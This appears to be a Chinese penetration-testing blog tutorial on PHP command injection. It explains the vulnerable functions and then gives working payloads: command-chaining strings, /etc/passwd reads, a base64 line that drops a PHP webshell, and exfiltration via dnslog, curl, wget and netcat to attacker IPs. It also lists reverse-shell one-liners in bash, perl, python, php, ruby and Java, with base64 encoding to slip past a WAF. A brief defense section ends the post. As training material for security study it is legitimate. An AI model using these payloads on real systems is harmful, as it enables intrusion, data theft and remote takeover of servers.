boxmoe_header_banner_img

⋅無⋅限⋅進⋅步⋅

加载中

POST
文章导读
渗透测试基础

命令执行漏洞

avatar
yuhui 2025年10月24日 29
0 评论

命令执行漏洞

概述

程序员使用脚本语言(比如 PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞

相关函数

在 PHP 中可以调用外部程序的常见函数:

system(args) 有回显

passthru(args)(有回显)

exec(args) (回显最后一行-必须 echo 输出)

shell_exec(args) (无回显-必须输出)

反引号:“

popen(handle,mode)(无回显)

proc_open(‘cmd’,’flag’,’flag’)(无回显)

$process = proc_open(‘dir’,$des,$pipes);

echo stream_get_contents($pipes[1]);

命令执行漏洞危害

继承 Web 服务器程序的权限,去执行系统命令

继承 Web 服务器程序的权限,读写文件

反弹 shell

控制整个网站

甚至控制整个服务器

命令执行漏洞分析

从代码中,ipaddress 参数是外部可以控制的,经过 explode 拆分,再判断类型,再使用 shell_exec 函数调用系统命令,所以存在命令执行漏洞

1746408808130-a32fb928-553e-4820-8677-c3160ae67493.png

命令执行漏洞攻击

;(分号)

命令按照顺序(从左到右)被执行,并且可以用分号进行分隔。当有一条命令执行失败时,不会中断其它

命令的执行。

ping -c 1 127.0.0.1;whoami

命令执行漏洞可以直接使用&&或者|和管道命令执行其他命令

命令链接符号解析

| (管道符号)

通过管理符 可以将一个命令的标准输出管理为另外一个命令的标准输入,当它失败后,会执行另外一条命令

ping -c 1 127.0.0.1|whoami

&(后台任务符号)

命令按照顺序(从左到右)被执行,跟分号作用一样;此符号作用是后台任务符号使 shell 在后台执行该任务,这样用户就可以立即得到一个提示符并继续其他工作

ping -c 4 127.0.0.1&cat /etc/passwd&

1746408934358-70d296fd-9cdc-4a35-9427-e68ee33087d6.png

&&(逻辑与)

前后的命令的执行存在逻辑与关系,只有【&&】前面的命令执行成功后,它后面的命令才被执行

ping -c 4 127.0.0.1&&whoami

1746408962770-fe3d97b0-78dd-4d9d-abd6-725e8f17844c.png

||(逻辑或)

前后命令的执行存在逻辑或关系,只有【||】前面的命令执行失败后,它后面的命令才被执行;

ping -c ||whoami

1746408987800-87f800f3-9599-4f7b-a871-9b7bd95bcc11.png

`(反引号)

当一个命令被解析时,它首先会执行反引号之间的操作。例如执行 echo ls -a 将会首先执行 ls 并捕获其输出信息。然后再将它传递给 echo,并将 ls 的输出结果打印在屏幕上,这被称为命令替换

echo whoami

$(command) 命令执行

这是命令替换的不同符号。当反引号被过滤或编码时,可能会更有效。

ping -c 4 127.0.0.1 $(whoami)

1746409028477-93d8003e-5fab-4d6f-99b9-2bc75084c787.png

win 命令链接符

| & || && 跟 linux 一样

有回显的

发现命令执行漏洞,如果是回显的情况下,获取系统敏感信息。

win 操作系统

type c:windowswin.ini

linux 操作系统

cat /etc/passwd

无回显

有回显的情况下相对交少,一般在实战环境环境中,无回显的环境较多,证明漏洞存在就需要各种利用外

通信技巧

命令执行漏洞外通信技巧

利用管道符号写入 SHELL

如果存在漏洞的页面有 web 服务器,有权限写入,利用 shell 命令写入 webshell 后门到网站目录,访问即可获取 webshell

echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php

1746409116390-22ef5019-c2e0-4900-83f0-a4ca7874bea5.png

带外通信技巧一般都是无回显的情况使用

dnslog

dnslog 是一个显示解析记录的平台,在无回显的情况下,通过访问 dnslog,dnslog 会把你访问的子域名的头文件记录下来

1746409134726-1a570759-4465-4731-8aa6-562ad88dbe28.png

使用反引号whoami得到的用户名再,子域名,再使用 icmp 协议访问 ping 域名

ping -c 4 127.0.0.1| ping whoami.3el05z.dnslog.cn

1746409147726-2552e157-a270-4f27-8bf8-8601fc06c2d9.png

如果存在漏洞得情况下 getsubdomin 就会得到回显得信息

1746409159950-65960473-26c0-406e-a996-1569fcf3ef82.png

burpsuite burpcollaborator 测试无回显

测试的原理和 dnslog 一样

使用 burpsuite 的 burpcollaborator 复制

1746409183119-f4e982f3-3f54-4f9f-96e8-854e0bc938c7.png

点击 copyt to clipboard 复制测试的子域名再拼接子域名

ping -c 4 127.0.0.1| ping whoami.xlmiw1sf16svvsbtwr5upgac137tvi.burpcollaborator.net

1746409205070-f6b1d37d-cc0d-47e0-a595-94b556467a4c.png

Poll now 是刷新频率,如果有访问记录,会自动把请求记录下来,这个时候就能看到回显的字符

利用日志测试无回显

利用 HTTP 协议,访问 WEB 中间件时,iis 或者 apache 或者小型服务,都存在访问日志。在 kali 上开启 python的小型服务器。再用 curl 协议访问远程服务器 ip 的 80 端口,再到 kali 的终端查看记录即可

使用 curl 命令

ping -c 4 ||curl http://192.168.0.133/?`whoami`

使用 wget 命令

ping -c 4 ||wget http://192.168.0.133/?`whoami`

1746409249156-02b4e645-83e0-4c5c-8ccb-25b008edc5a0.png

netcat

如果目标系统存在有 netcat 在 ubuntu 系统都会存在的。使用命令读取文件传递到远程服务器上

远程服务器监听命令

nc -lp 9999 >passwd

本地执行命令

nc 192.168.0.133 9999 </etc/passwd

会在查看远程服务器生成 passwd 文件

1746409278782-2e7f6ed0-663a-4be1-b6f3-28743d6e79e2.png

命令执行漏洞 nc 反弹 shell

在执行命令漏洞,一般的利用方式是执行反弹 shell,再进行其他的操作。执行反弹 shell 的命令有许多

反弹 shell 因为是从受害者,反向连接远程服务器,请求是从内部到外部,所以防火墙防火墙是不会进行拦截

远程服务器 nc 监听命令

nc -vlnp 8080

受害者反弹 shell 命令,每种语言都有 sock 连接命令,可以根据不通过的环境,选择合适的命令

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl -e ‘use

Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

python -c ‘import

socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

php -r ‘$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’

ruby -rsocket -e’f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d2>&%d",f,f,f)’

nc -e /bin/sh 10.0.0.1 1234

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line

2>&5 >&5; done"] as String[])

p.waitFor()

如果有 waf 进行连接,可以把语句进行 base64 加密后,因为加密后的字符串没有触发拦截规则,再利用

shell 命令再进行解码

bash -i >& /dev/tcp/192.168.0.103/8080 0>&1

base64 编码后 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAzLzgwODAgMD4mMQ==

受害者执行

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTMzLzgwODAgMD4mMQ=="|base64 -d|bash

远程服务器监听

1746409447587-1d16a125-b1c3-44fe-996c-5b2f843824f3.png

命令执行漏洞防御

不执行外部的应用程序或命令

尽量使用自定义函数或函数库实现外部应用程序或命令的功能。在执行 system、eval 等命令执行功能的函数前,要确认参数内容。

使用 escapeshellarg 函数处理相关参数

escapeshellarg 函数会将用户引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“’”,双引号“"”会被转义为“"”,分号“;”会被转义为“;”,这样 escapeshellarg 会将参数内容限制在一对单引号或双引号里面,转义参数中包括的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。

使用 safe_mode_exec_dir 执行可执行的文件路径

将 php.ini 文件中的 safe_mode 设置为 On,然后将允许执行的文件放入一个目录,并使用safe_mode_exec_dir 指定这个可执行的文件路径。这样,在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir 指定的目录中才会允许执行,否则执行将失败

更新: 2025-05-05 09:44:56
原文: https://www.yuque.com/yuhui.net/network/zkh5ixpfzwm47gme

Post Views: 30
记录 Windows kali Python 防火墙

评论(0)

查看评论列表

暂无评论

发表评论

表情 颜文字

插入代码